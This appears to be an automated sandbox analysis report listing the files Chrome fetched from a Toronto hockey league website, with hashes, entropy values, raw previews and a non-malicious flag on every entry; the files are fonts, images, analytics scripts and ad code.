                                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtE6F15M.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWvU6F15M.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: italic;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memtYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWqWtU6F15M.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Open Sans';. font-style
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):868
                                                                                                                          Entropy (8bit):7.63400994955065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S/6l7ZvqoOhYANeCvAem6u+vSSIlLTV5IJX4TCNr:S/6lVBOCK0ZxlLToeCF
                                                                                                                          MD5:A1E561AEB53F4F4312149A4C3F65888D
                                                                                                                          SHA1:C61EE90203E16D491537BC866C91DF98E210BE09
                                                                                                                          SHA-256:6DEE0551D30806493F0B5F9DCC19A317BF51EA04F98D3EA44FFF69A21F12C2D3
                                                                                                                          SHA-512:1B4E197874F7CB86777BC408E3B461998BA03A6EB52D8C02A09D3DAAC1D5571FBBD0AD37F30CF05323409BFDC8216AE6BE623F8ADC891018EF6BA50AC502481D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs.................IDATx..YKK.P.....\.VD[7b.tQP....*].....@...n|.?@....tU.E.m).t..A:.....g8g&...q..$..8....{.{.$.g..f.a.X,_y.O.<..1.Z&..?.x..U..1.Mk..}..K......<........s9]wM@o..M......8%$....E...D.........d.Y.=.50>>.........L.....\...p8..k'''.........'.h4J.WWW...p.....Z-p:....E..//)EQ.w.....#*...Kc...t....r..n...s......c.mthh...&..u.......mZ.H$".Z............"fo2......].l.T...;.....H&.4gii.k.L.F&.....%r.........R..iA.w.Z.F........ey{......f$..>...|||L`1ONNh......3-.P,.{U.###.*.FC.............@.V.<....@__....Q..m6[G.....b![....4....E^.V_.........^YY.....3..~:..Z)rf$......KE.S..m..mnn.jh.g.....;[(..R..DL...GGG.'011A.R....`.9.T.H,,,.....j......+p.\.v.v.-[h4z..........%..........P..J.....!9S.....1.}.a>z.R.d..F]a.u.........i...z..V..=.....W....q..... |...+M....P6.x.U.7..3...F.$:........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):27788
                                                                                                                          Entropy (8bit):7.850273442343946
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:CQPlful62p4PxOcgqU7daCm+iSejI+miYPl55MOD3Cp:VxlcIU5JPOIhiY/lD3Cp
                                                                                                                          MD5:23A35E3DC32BA6651058DC1BB5411C18
                                                                                                                          SHA1:763BBA24B0FA26F2A89770320537EEFF4699BC67
                                                                                                                          SHA-256:2EF95DCB23E591460ECBB6C58F8B5B08E263F49FF9A852D487E161FE86C761BB
                                                                                                                          SHA-512:0E3218FE606F9B15BA38933717D708FEDA908255AB6AA741C47BF753EB50EF325D2C54147DDAE7A4622C0C156D7A7ECA1B747EAFE0C785F5964F6995BD73C972
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/06103844/DECA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................Z.........................1..!Q..A.."Waq......2.....#45BRUs....6TVbrt.$%37CGSu........D.c..................................I..........................!1A..Qa....Rbq...."2Scr......#4B..35.CD..6s..............?.. ..s...............p....YSR.......{.....cYQ../.],..M.....K......'.%...mci[IJt..a..seMK..scW.5.:.u/..(..V..9e.J...-..t.J..[.x.k.1[.......D.R.R[.....4........(..........Iq.....].....@....*.@.........qb......5.....A-.I`.R..hI.................`.....B..(..`.....................^.e...@.|.9....7m.....{>.4kY2._...o."..15_.....t...+.#...t...;.|..z..-ToG1..V.,.....|..q..N[.Kw.......[..........c....g....u~..........seMK..skW.5.7....eYQ../.],..K............'.%..Kk.J.JS$.{.O..*jX.......a.Z.P.....A.l.-..Q.z....U.X...n5.....]..{..$*..*...%.....H]Hd..e..........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):530
                                                                                                                          Entropy (8bit):7.2576396280117494
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUhUxzPKmghSn8nazyk+k8/OzxQcxNMvVb:bhUxzlvWkT8FcxK1
                                                                                                                          MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                                                                                          SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                                                                                          SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                                                                                          SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/audio_2x.png
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX...JBA.....E-R... (#..-*$.}.%.Kt.A..Dx.I...AF.Q.4.......-.6..?.m:.,.......Q..D.L..e4..2.D..8)j4:......&>.s......p?......9.o5>.][H.}...&L.%.xh{~K.J|.b..N..HMp....f.}dd..S..4%...$dK..!..Z..NNs.W&g..Fn....p...w..Ut...E\.e.......6......M.F...X.L......em.....R#'..%....j$/..-......@.l."..M.|....OtW.H.,.-.~W`Z.s8..W...B...C-.8"H....6......9...A..aO.1`.M..A..eA.{...-...U.,.W........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1341
                                                                                                                          Entropy (8bit):7.796703810919794
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:mhPVlADhqMmAOgpbBxy8ROH4VudUwA84H/SYkl0N721Gb+8F2yENnSLbLq1/2Ru:cP0MMMgVBUHvqHqVeygq+MSvOcRu
                                                                                                                          MD5:D3FCC653F1F33F316CBE67D4F117430E
                                                                                                                          SHA1:15DBEBF41EF26414A5B4952884ACE43AD8FF11C2
                                                                                                                          SHA-256:CD0117C886CC80F8D6CD7077AADEBA7AF41A06885D93E2A82BC6F46463948669
                                                                                                                          SHA-512:F597F31A95BBA24EC857308FC706822886218A7AD2F222B11B21F44DB3A77D24460A55BDC992FC011F9ADFF91360F41FFF362C9386618646901D62727E74E650
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://static.ctctcdn.com/lp/images/standard/logos/logo-ctct-white.svg?v=2020
                                                                                                                          Preview:(./..X.)..L .$0m.t0.........2.Y1w!..F..{..W.............U.p.J.M..:_e.[.+s#.s.UC..3.ki...vv.Z......q[.F.y..V)tR..Fs....}v.k...f6.nK.Q.7."..P...........88.......,A.......CA.zP`H<8....Kxx.`.8"""!!....Eb.... B%..9.R%.........J.K,@,..8,*qN.........h(..S.#m..t#?..O...<.d.........gw.lI.n.NY...fF... .9..H....+.Y.l%9=p..J..z.FU..q...m.Pn%...\g.z...x.].[..jU..n..O...ZO;..%w"...J.............x c.....'x.q...R..khz.<....G.hK.1ps..K##.ZgL..J%.`..Q....;|KW.....r /.<.w...g)[.=5G...-..."m...~.^%.n... ..*....|V....fk.3.w..v....jfK[b.Rf.y[O.X.......F...C...]...2....t.4..5.Tw.;UM..%..B.%$..V..k..... H...5.\C.i.a.1L.H...2.J...V...sM..:c.O!...R..T.8.*......CKKw;w..R.Fz..JT.).hC...M..qg.kX..a..2'f.2rKiJ....>.....4......)HA..a.DQ.9(1....!#"..L$..d..........l.]..b..4...w'X..v(T..E.6..).a..'...B..^..!...W....'..C..4.......$+4.... ..".f.1....S...'e7).......fg2.n....E...i..p.u*.t.,...i0U/...F...m..C%...........^Q...8.........%.I .F....;.!...C[L.T...:pKq|..C....5...K....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):195222
                                                                                                                          Entropy (8bit):4.63627999816095
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:eHGylWlyDD/DCD/DCDAc8NrJrriXkrlbuv5DDD2DDHot70WfJrHFP2h7G+Wofez:yGTyyY0Wfd
                                                                                                                          MD5:6E013D57DE886B205B2ACC63DDDF70D8
                                                                                                                          SHA1:89886EBD3564645A83B1CFC2A3ED6AC95BD6B62C
                                                                                                                          SHA-256:D5FF1E7AB48644F9634DCAFE79F3C7A9F9C45E62BA751EAF8F2951F84BFEA3B5
                                                                                                                          SHA-512:61F2176C88807E5FE2F4B3B83D411363187BDAF7A2544F62C5622D4CEC76EBB2E262C595007B933B5DE31308841401EB06D1FCEDAE3BFAC7A1A94317DCBDE2DB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:!function(c,M){"use strict";"object"==typeof module&&module.exports?module.exports=M(require("moment")):"function"==typeof define&&define.amd?define(["moment"],M):M(c.moment)}(this,function(b){"use strict";void 0===b.version&&b.default&&(b=b.default);var M,a={},p={},n={},i={},e={};b&&"string"==typeof b.version||S("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/");var c=b.version.split("."),A=+c[0],o=+c[1];function L(c){return 96<c?c-87:64<c?c-29:c-48}function z(c){var M=0,A=c.split("."),o=A[0],z=A[1]||"",b=1,a=0,p=1;for(45===c.charCodeAt(0)&&(p=-(M=1));M<o.length;M++)a=60*a+L(o.charCodeAt(M));for(M=0;M<z.length;M++)b/=60,a+=L(z.charCodeAt(M))*b;return a*p}function O(c){for(var M=0;M<c.length;M++)c[M]=z(c[M])}function q(c,M){for(var A=[],o=0;o<M.length;o++)A[o]=c[M[o]];return A}function r(c){var M=c.split("|"),A=M[2].split(" "),o=M[3].split(""),z=M[4].split(" ");return O(A),O(o),O(z),function(c,M){for(var A=0;A<M;A++)c[A]=Math.round((c[A-1]||
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5960)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):287932
                                                                                                                          Entropy (8bit):5.585781392678999
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:HcV9yIJDtxaW0GaUsUhNuxc+E3OPoKbU472jAYqmjO:8BJZ4WSyNu0ed7vmq
                                                                                                                          MD5:8903C409304B3AA7226C7FC08C8C2CB9
                                                                                                                          SHA1:0768E59980ECE7AEAEC7BDD2887C486296DAEDBE
                                                                                                                          SHA-256:17B24D6CFBACA731147DA55B3CB52BA3EC87A587E7A26FA780E84EC2CD367DE4
                                                                                                                          SHA-512:26E64A6AD6A66C5669394E2345A31742FE51B84A551588839CB3C9A4AF3338A4E02786A7D5F41147E50B7EAE225C1475ABC6CD2F9F537D067D7877318C465D9A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":9},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":11},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTO
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (53752)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):55012
                                                                                                                          Entropy (8bit):5.755309837462447
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:j2GWlqVWMEJ+fO39xx0Dbgjl7Kf9ROMhE:hbVWBvx2GsE
                                                                                                                          MD5:C73AF51A0C055A6F37675878F564999B
                                                                                                                          SHA1:CC02D35CF433C95D6CB66239A32D5585FC1166E3
                                                                                                                          SHA-256:8D037FB6238A749B969139D99F8A03B19A1A66899972361F4B080F01762431CC
                                                                                                                          SHA-512:F9A216239B0754049D0004C6128F8D40E14D5AA03374C650A03E45153C4522CAAF2D445011B34D6D0724F97757B369CB9C59BA13E0392668E1B6BD8D235B25F2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://pagead2.googlesyndication.com/bg/jQN_tiOKdJuWkTnZn4oDsZoaZomZcjYfSwgPAXYkMcw.js
                                                                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function O(A){return A}var V=this||self,C=function(A,U,u,T,t,I,B,J,K,v,D,Y){for(Y=D=7;;)try{if(D==17)break;else{if(D==76)return K;if(D==98)return Y=7,K;D==u?D=V.console?87:98:D==T?(Y=7,D=u):D==87?(V.console[t](v.message),D=98):D==7?(J=V.trustedTypes,K=B,D=11):D==11?D=J&&J.createPolicy?U:76:D==U&&(Y=A,K=J.createPolicy(I,{createHTML:P,createScript:P,createScriptURL:P}),D=98)}}catch(e){if(Y==7)throw e;Y==A&&(v=e,D=T)}},P=function(A){return O.call(this,A)};(0,eval)(function(A,U){return(U=C(23,13,73,40,"error","bg",null))&&A.eval(U.createScript("1"))===1?function(u){return U.createScript(u)}:function(u){return""+u}}(V)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjog
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):868
                                                                                                                          Entropy (8bit):7.63400994955065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:S/6l7ZvqoOhYANeCvAem6u+vSSIlLTV5IJX4TCNr:S/6lVBOCK0ZxlLToeCF
                                                                                                                          MD5:A1E561AEB53F4F4312149A4C3F65888D
                                                                                                                          SHA1:C61EE90203E16D491537BC866C91DF98E210BE09
                                                                                                                          SHA-256:6DEE0551D30806493F0B5F9DCC19A317BF51EA04F98D3EA44FFF69A21F12C2D3
                                                                                                                          SHA-512:1B4E197874F7CB86777BC408E3B461998BA03A6EB52D8C02A09D3DAAC1D5571FBBD0AD37F30CF05323409BFDC8216AE6BE623F8ADC891018EF6BA50AC502481D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/08/29093927/icons8-twitterx-48-1.png
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......pHYs.................IDATx..YKK.P.....\.VD[7b.tQP....*].....@...n|.?@....tU.E.m).t..A:.....g8g&...q..$..8....{.{.$.g..f.a.X,_y.O.<..1.Z&..?.x..U..1.Mk..}..K......<........s9]wM@o..M......8%$....E...D.........d.Y.=.50>>.........L.....\...p8..k'''.........'.h4J.WWW...p.....Z-p:....E..//)EQ.w.....#*...Kc...t....r..n...s......c.mthh...&..u.......mZ.H$".Z............"fo2......].l.T...;.....H&.4gii.k.L.F&.....%r.........R..iA.w.Z.F........ey{......f$..>...|||L`1ONNh......3-.P,.{U.###.*.FC.............@.V.<....@__....Q..m6[G.....b![....4....E^.V_.........^YY.....3..~:..Z)rf$......KE.S..m..mnn.jh.g.....;[(..R..DL...GGG.'011A.R....`.9.T.H,,,.....j......+p.\.v.v.-[h4z..........%..........P..J.....!9S.....1.}.a>z.R.d..F]a.u.........i...z..V..=.....W....q..... |...+M....P6.x.U.7..3...F.$:........IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 197x197, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):90825
                                                                                                                          Entropy (8bit):7.972866927008382
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:tz2BxkJouQrblLwnwGUTDsFzSQqW/BIixRtZ26ASLMipJnYVRKb358sGO6F:ty9uRxUTTQqW/qmPk6ASLfpqKr+3F
                                                                                                                          MD5:7219E58173FF112FD7ED0BB3979B1EEB
                                                                                                                          SHA1:F34D306DD92239FCEB76DCB14B90335DA0E8C3C3
                                                                                                                          SHA-256:905ADC220274D01E29FEF8EA500D2855DA3E5BFD8AC80D78A8841DAB9991A562
                                                                                                                          SHA-512:4261D8E4BB116D39BE361FC4D339480F16A5DEEA712A3B346EDA092DA7039F8185F61BCADB2FFE2879B0AD68553558E9B25FB9A4B08A5DD23B02F5182087068D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.............C....................................................................C............................................................................"..........................................Z..........................!..1..AQa."q.2B.....#Rbr..$3.....4CS.%cs...D...6T....&'5Ed.U...................................<.......................!..1AQ."a..2q......B...#Rbr..$.C..............?..5._K......I.U.....>JO...r.0.....-a..R...f.l73.....6...j.).e'.T.....z$>.:...c...Eo.;...F.l..(....C.QeFz.#2\#lG.......e...>.1..+'|.2Laz...ws.&..C%..#...\.N..%.'.!.d..U..}Xi..W.._4mv.i..Qm.jf.P.^.....z..?.*"."..Q./.D.}\.1.....2..H.D....?..qT*.}..a.....>.G.......NN...m$.%.._..B.k.....%..m..s.....jv...mEA....A....8......\...A)Gz.eL.} ..v..k.........%`....o.+..}.)..(..v.8.Z....N..T.k.%..\.R.X..].....Q./...J.*.U~TIT..D.E .##.`...$....Ou.tTB@R3.T|.'..sX.).D...'../56...@.JH.7.!...W..L.i......8.RNc...S....&..u;.....S.]n$.H...."..7..{.1e..7T.D..!!.L..Ae3U..W#....6.0b.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 730 x 432, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):574526
                                                                                                                          Entropy (8bit):7.99373281021127
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:12288:/zWvFhgySZ7lvdi1tLh35lQqawK2TvA/WhKZQ:/zWN2/7lvOLnlQHwK0/SQ
                                                                                                                          MD5:16D1720F2D45A79A5C22E39358DEB46C
                                                                                                                          SHA1:34FFC049114374621E9CCA97252A8B59F2782EE8
                                                                                                                          SHA-256:27D4E7C51913182CB6F76E8FF85902EF16E8AB1DDBFE88AA53DF4F52D2D1D4E6
                                                                                                                          SHA-512:22FCE5698F422C49D5C0249EF590F65EAFDF20512F91E37DE415C2988050D9645E5890A207F383DC7420565209730BF82D7C4F2F359C3B0C85AB0161C8485351
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR..............i.....IDATx..I.%...}...Ow..#.{M5.D.....u..ZK$.&.kq.............ER.!V..&...&n....n.5.mf....|.%../#.=..........W......1../.cD......(..0.......o.....@..u..........._.>........v...8. ......C......9.../...l..0.1...+............/|..K....,..pt.....!0..~..8.8;;.G.}...c..`..3.......?..c..^\......_..@ ..{\]^.........3...)...!....#..O.....q...0......%n.nqrr.E.,.,.a.?.A...B.1`...X/..._..G.5~....Y....?`.Y.:...#Xk.Zm.......B.;I..?.........Y!........5...k8k0....X.W...D\^.Y.../....~....3#p@.ux..._~.%>..#..+03.........k.....?...{. .Yyo.9f..0......'g..................x.....w...........1.... . ......*...B.u.....`..!...n....x.....4 2`.v.=.?y......k..a...a....=...?._.'....o...?..;?...k....(..y.t.L\.. f..0....e?...=....1.......f..0c............O...|...)F6...c.Y.=.8Y..3........!0.3.|.~p}..@.>....9.0.......~.3|..%...._..~..\.^.X.T.E.........>.<...5,.Z....!~...~.?.g...z..............r.H.A.@F....`&.!..S....>c~.....q]....._............._
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (8091)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):8170
                                                                                                                          Entropy (8bit):5.190502449771293
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:Gw74GtZNg2K4Hhh7sgL3YKxNw9kcECKsCWk+Ox62OFhqrBogHsteZ6tr2rlS:cmfKK7RjYKKiWk+OxoFQrB1pZ69
                                                                                                                          MD5:993DE22BBCECA8FF77942767438C43E9
                                                                                                                          SHA1:110906C9008EE919993CE272D010D48DBF08C391
                                                                                                                          SHA-256:8788A6A30BF21825000421A23D09A6A37DF58FB2B0E3CE29198896986DCF51B4
                                                                                                                          SHA-512:8B035F296F005A251A1AC0FB24A1FF518B541E35A7E96E7747C57C914F09BD8E6F229523AE2DEB1C604CD66E4E1DA4E1F1C2B5DF49250382387BA447CB7DA258
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min.js
                                                                                                                          Preview:/*! ReactMiniRouter 1.1.7 - https://github.com/larrymyers/react-mini-router */.var ReactMiniRouter=function(t){function e(r){if(n[r])return n[r].exports;var o=n[r]={exports:{},id:r,loaded:!1};return t[r].call(o.exports,o,o.exports,e),o.loaded=!0,o.exports}var n={};return e.m=t,e.c=n,e.p="",e(0)}([function(t,e,n){t.exports={RouterMixin:n(2),navigate:n(4)}},function(t,e,n){var r=!("undefined"==typeof window||!window.document||!window.document.createElement);t.exports={canUseDOM:r,hasPushState:r&&window.history&&"pushState"in window.history,hasHashbang:function(){return r&&0===window.location.hash.indexOf("#!")},hasEventConstructor:function(){return"function"==typeof window.Event}}},function(t,e,n){function r(t){var e,n,r=t.props.path||t.context.path;return!r&&f.canUseDOM&&(n=p(window.location.href),t.props.history?r=n.pathname+n.search:n.hash&&(e=p(n.hash.slice(2)),r=e.pathname+e.search)),r||"/"}function o(t){if(!(t.defaultPrevented||t.metaKey||t.ctrlKey||t.shiftKey||0!==t.button)){for(v
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):70662
                                                                                                                          Entropy (8bit):5.9359164399768
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:TR98glRj5nDFvSCd1CORANNsVuFC5xEBNm1Y:t984ZPvSCdLET9BNh
                                                                                                                          MD5:D0368BAA7C734310FDA12BE4AB28A546
                                                                                                                          SHA1:DCBB1D4F5F8875ABCBFFCEA4841EB85020752C33
                                                                                                                          SHA-256:0648A7C9E1948020CA420610797EEE607FB77AF4AFC206030B03B3636C562D9A
                                                                                                                          SHA-512:13A9D561F3EEBB2F8CB7BE2D51A2EFF486C3692EDAAB112C3590E22E3789415AD8D6EF64BC36266CF983D50AF42BF3B284B8647CF7408CEE6FD2616A58102D42
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://securepubads.g.doubleclick.net/gampad/ads?pvsid=4461304755155343&correlator=709494525036105&eid=31088846%2C31085776%2C83321073%2C31086810%2C95340253%2C95340255&output=ldjh&gdfp_req=1&vrg=202501070101&ptt=17&impl=fifs&iu_parts=128473736%2CGTHL_Leaderboard&enc_prev_ius=%2F0%2F1&prev_iu_szs=970x250%7C970x90%7C728x90&ifi=2&sfv=1-0-40&sc=1&cookie_enabled=1&abxe=1&dt=1736802081720&lmt=1736802081&adxs=467&adys=276&biw=1903&bih=953&scr_x=0&scr_y=0&btvi=0&ucis=2&oid=2&u_his=1&u_h=1080&u_w=1920&u_ah=1040&u_aw=1920&u_cd=24&u_sd=1&u_tz=-300&dmc=8&bc=31&nvt=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTI4LjAuNjYxMy4xMjAiLG51bGwsMCxudWxsLCI2NCIsW1siQ2hyb21pdW0iLCIxMjguMC42NjEzLjEyMCJdLFsiTm90O0E9QnJhbmQiLCIyNC4wLjAuMCJdLFsiR29vZ2xlIENocm9tZSIsIjEyOC4wLjY2MTMuMTIwIl1dLDBd&url=https%3A%2F%2Fgthlcanada.com%2F&vis=1&psz=970x0&msz=970x0&fws=0&ohw=0&topics=9&tps=9&htps=10&nt=1&psd=WzE1LFtudWxsLG51bGwsbnVsbCwiZGVwcmVjYXRlZF9rYW5vbiJdLG51bGwsM10.&dlt=1736802072109&idt=5963&prev_scp=lang%3Deng&adks=3145876704&frm=20&eoidce=1&td=1&egid=48566&tan=ac9f98fe-8a22-4c45-9038-325d4fc698ee&tdf=2
                                                                                                                          Preview:{"/128473736/GTHL_Leaderboard":["html",0,null,null,0,90,728,0,0,null,null,null,1,[["ID=6d9866d31a65e289:T=1736802083:RT=1736802083:S=ALNI_MY1bnpH8H43TaXSG9pWVgourSzV3w",1770498083,"/","gthlcanada.com",1],["UID=00000fcdc4032696:T=1736802083:RT=1736802083:S=ALNI_MYZdiUQD0PJuZN553NjJ0pye5H5Sw",1770498083,"/","gthlcanada.com",2]],[138499590320],[6858770131],[5351479350],[3656332063],null,null,null,null,null,null,null,0,null,null,null,null,null,null,"AOrYGslBDx0V-X8uBdf7e6sWwraMqgI0oR0Jhr-m2RXPDenKTjVCnPMjC8Gkqej6zBeWx8HCZYyb-PqS7RCN9w","CJ-s4vnL84oDFWGt0QQdQj0Slg",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[["ID=ed46b0024381edfc:T=1736802083:RT=1736802083:S=AA-AfjbuN4A_snl-qjk8-sBS8xIq",1752354083,"/","gthlcanada.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20250109';</script><script>var google_casm=[];</script><style>a { color: #000000 }</style><scr
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5960)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):287932
                                                                                                                          Entropy (8bit):5.585899853674379
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:HcV9yIJDtxaWVGaUsUhNuxc+E3OPoKbU472jAYqmjO:8BJZ4WDyNu0ed7vmq
                                                                                                                          MD5:23F5276FD2A258F7EA522965E61C21C8
                                                                                                                          SHA1:00C8BCF214EA266C82AD876E18FA8EC4790654B1
                                                                                                                          SHA-256:17ECB8E60CD92F0303E44064878C78E234EBF835889B970D1DC5AA85A018BAAE
                                                                                                                          SHA-512:4C948E2087206853D43C2DEDBE7C09951ACFE105AD9F4CBA16F4278CCE34FB7E24163918BB4B306D63C8E8671C2C797317E0FCA728BD186F8463A9CDF6D8FE84
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-Q2PCJC1JGC&cx=c&_slc=1
